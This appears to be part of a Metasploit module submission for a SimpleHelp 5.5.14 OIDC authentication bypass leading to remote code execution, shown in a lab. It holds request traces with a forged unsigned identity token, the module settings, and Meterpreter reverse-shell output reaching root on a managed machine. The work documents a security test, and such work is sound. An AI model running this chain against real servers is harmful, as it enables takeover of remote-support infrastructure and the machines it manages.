Cookie: shelp-tc-sessionid=0MGvw0KnwDfhsO47VZV6EDv9oXY1j5KANik4OM6S4P4=
Content-Type: application/x-www-form-urlencoded
Content-Length: 329

state=04141af8-92f8-4328-9994-3624ffd135cf&id_token=eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhNzAwZmVjNS1hNWQ2LTRlNWEtYTIzNi05ZWIyZjRkNTM2NTUiLCJwcmVmZXJyZWRfdXNlcm5hbWUiOiJ3aWxidXIubm9sYW4iLCJuYW1lIjoiRnJpZGEgS29lbHBpbiIsImVtYWlsIjoid2lsZm9yZC5jcm9uaW5AZGVja293LmV4YW1wbGUiLCJpYXQiOjE3ODc2OTgyODIsImV4cCI6MTc4NzcwMTg4Mn0.x
####################
# Response:
####################
HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Location: /webapps/technician/
Content-type: text/html
Content-length: 0
Keep-Alive: timeout=0
Connection: Keep-Alive


####################
# Request:
####################
GET /auth/v1/account/status HTTP/1.1
Host: 172.16.199.131:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0
Cookie: shelp-tc-sessionid=0MGvw0KnwDfhsO47VZV6EDv9oXY1j5KANik4OM6S4P4=


####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json
Content-Length: 186
Keep-Alive: timeout=300
Connection: Keep-Alive

{"state":"FULLY_AUTHENTICATED","user":{"uniqueID":102172,"displayName":"Frida Koelpin","username":"wilbur.nolan","emailAddress":"wilford.cronin@deckow.example","isOnline":true},"code":1}
[+] Authenticated as SimpleHelp technician wilbur.nolan
####################
# Request:
####################
GET / HTTP/1.1
Host: 172.16.199.131:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0
Cookie: shelp-tc-sessionid=0MGvw0KnwDfhsO47VZV6EDv9oXY1j5KANik4OM6S4P4=
Connection: Upgrade
Upgrade: WebSocket
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: f4RCS+OoF/CDRCXtzefbHg==


####################
# Response:
####################
HTTP/1.1 101 Web Socket Protocol Handshake
Connection: Upgrade
Date: Tue, 25 Aug 2026 22:51:23 GMT
Sec-WebSocket-Accept: KIibgtHTg04O7NgvfNtoPqlDLKU=
Server: TooTallNate Java-WebSocket
Upgrade: websocket


[*] Found 1 managed machine
[*] Connecting to managed machine "msfuser-VMware-Virtual-Platform" (SG_694475357954214171)
[*] Executing the payload through the Unix/Linux/macOS Command terminal
[*] Sending stage (3090404 bytes) to 172.16.199.131
[*] Meterpreter session 2 opened (172.16.199.1:8873 -> 172.16.199.131:34322) at 2026-08-25 15:51:33 -0700

meterpreter > getuid
Server username: root
smeterpreter > sysinfo
Computer     : msfuser-VMware-Virtual-Platform
OS           : Ubuntu 24.04 (Linux 7.0.0-28-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
``` 

</p> 

</details> 

Module run with `httptrace = false`
```
msf exploit(multi/http/simplehelp_oidc_auth_bypass_rce) > set RHOSTS 172.16.199.131
RHOSTS => 172.16.199.131
msf exploit(multi/http/simplehelp_oidc_auth_bypass_rce) > set RPORT 8444
RPORT => 8444
msf exploit(multi/http/simplehelp_oidc_auth_bypass_rce) > set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
PAYLOAD => cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(multi/http/simplehelp_oidc_auth_bypass_rce) > set LHOST 172.16.199.1
LHOST => 172.16.199.1
msf exploit(multi/http/simplehelp_oidc_auth_bypass_rce) > set FETCH_SRVHOST 172.16.199.1
FETCH_SRVHOST => 172.16.199.1
msf exploit(multi/http/simplehelp_oidc_auth_bypass_rce) > set rport 8443
rport => 8443
rmsf exploit(multi/http/simplehelp_oidc_auth_bypass_rce) > run
[*] Started reverse TCP handler on 172.16.199.1:8873
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. SimpleHelp 5.5.14 exposes OIDC provider(s): Metasploit OIDC Lab
[*] Requesting an authorization flow for OIDC provider "Metasploit OIDC Lab"
[*] Submitting a forged identity token for "wilbur.nolan"
[+] Authenticated as SimpleHelp technician wilbur.nolan
[*] Found 1 managed machine
[*] Connecting to managed machine "msfuser-VMware-Virtual-Platform" (SG_694475357954214171)
[*] Executing the payload through the Unix/Linux/macOS Command terminal
[*] Sending stage (3090404 bytes) to 172.16.199.131
[*] Meterpreter session 1 opened (172.16.199.1:8873 -> 172.16.199.131:36478) at 2026-08-25 10:26:15 -0700

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : msfuser-VMware-Virtual-Platform
OS           : Ubuntu 24.04 (Linux 7.0.0-28-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```

## Environment

  | Field | Details |
  |-------|---------|
  | **Operating System** | Ubuntu 24.04.4 LTS managed endpoint; Ubuntu 22.04-based SimpleHelp container |
  | **Target Software/Hardware** | SimpleHelp Server 5.5.14 with a SimpleHelp Remote Access managed machine |
  | **Docker Image / Vagrant Setup** |  alzahar/simplehelpserver:5.5.14 with persistent configuration volume and ports 8443:80 and 8444:443 |

## AI Usage Disclosure
OpenAI Codex was used